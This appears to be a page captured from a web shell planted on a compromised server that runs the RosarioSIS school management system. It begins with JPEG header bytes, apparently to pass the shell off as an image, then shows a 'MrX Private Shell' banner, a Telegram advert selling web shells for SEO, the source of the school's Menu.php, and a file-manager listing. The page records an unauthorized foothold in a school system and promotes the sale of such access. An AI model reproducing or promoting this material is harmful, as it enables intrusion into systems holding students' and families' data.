����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /** * School Setup module Menu entries * * @uses $menu global var * * @package RosarioSIS * @subpackage modules * * @see Menu.php in root folder */ $menu['School_Setup']['admin'] = [ 'title' => _( 'School' ), 'default' => 'School_Setup/Calendar.php', 'School_Setup/PortalNotes.php' => _( 'Portal Notes' ), 'School_Setup/PortalPolls.php' => _( 'Portal Polls' ), 'School_Setup/Calendar.php' => _( 'Calendars' ), 'School_Setup/MarkingPeriods.php' => _( 'Marking Periods' ), 'School_Setup/Periods.php' => _( 'Periods' ), 'School_Setup/GradeLevels.php' => _( 'Grade Levels' ), 'School_Setup/Schools.php' => _( 'School Information' ), 1 => _( 'Setup' ), 'School_Setup/CopySchool.php' => _( 'Copy School' ), 'School_Setup/SchoolFields.php' => _( 'School Fields' ), 'School_Setup/Configuration.php' => _( 'Configuration' ), 2 => _( 'Utilities' ), 'School_Setup/Rollover.php' => _( 'Rollover' ), 3 => dgettext( 'Access_Log', _( 'Security' ) ), 'School_Setup/AccessLog.php' => _( 'Access Log' ), 'School_Setup/DatabaseBackup.php' => _( 'Database Backup' ), ] + issetVal( $menu['School_Setup']['admin'], [] ); $menu['School_Setup']['teacher'] = [ 'title' => _( 'School' ), 'default' => 'School_Setup/Calendar.php', 'School_Setup/Schools.php' => _( 'School Information' ), 'School_Setup/Calendar.php' => _( 'Calendars' ), 'School_Setup/MarkingPeriods.php' => _( 'Marking Periods' ), // Add Periods to teachers. 'School_Setup/Periods.php' => _( 'Periods' ), ] + issetVal( $menu['School_Setup']['teacher'], [] ); $menu['School_Setup']['parent'] = [ 'title' => _( 'School' ), 'default' => 'School_Setup/Calendar.php', 'School_Setup/Schools.php' => _( 'School Information' ), 'School_Setup/Calendar.php' => _( 'Calendars' ), // Add Marking Periods to parents & students. 'School_Setup/MarkingPeriods.php' => _( 'Marking Periods' ), ] + issetVal( $menu['School_Setup']['parent'], [] ); $exceptions['School_Setup'] = [ 'School_Setup/PortalNotes.php' => true, 'School_Setup/Rollover.php' => true, ];
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| includes | Folder | 0755 |
|
|
| AccessLog.php | File | 5.65 KB | 0644 |
|
| Calendar.php | File | 31.26 KB | 0644 |
|
| Configuration.php | File | 24.2 KB | 0644 |
|
| CopySchool.php | File | 7.95 KB | 0644 |
|
| DatabaseBackup.php | File | 2.99 KB | 0644 |
|
| GradeLevels.php | File | 4.66 KB | 0644 |
|
| MarkingPeriods.php | File | 21.84 KB | 0644 |
|
| Menu.php | File | 1.99 KB | 0644 |
|
| Periods.php | File | 8.26 KB | 0644 |
|
| PortalNotes.php | File | 7.57 KB | 0644 |
|
| PortalPolls.php | File | 11.62 KB | 0644 |
|
| Rollover.php | File | 36.85 KB | 0644 |
|
| SchoolFields.php | File | 2.88 KB | 0644 |
|
| Schools.php | File | 10.37 KB | 0644 |
|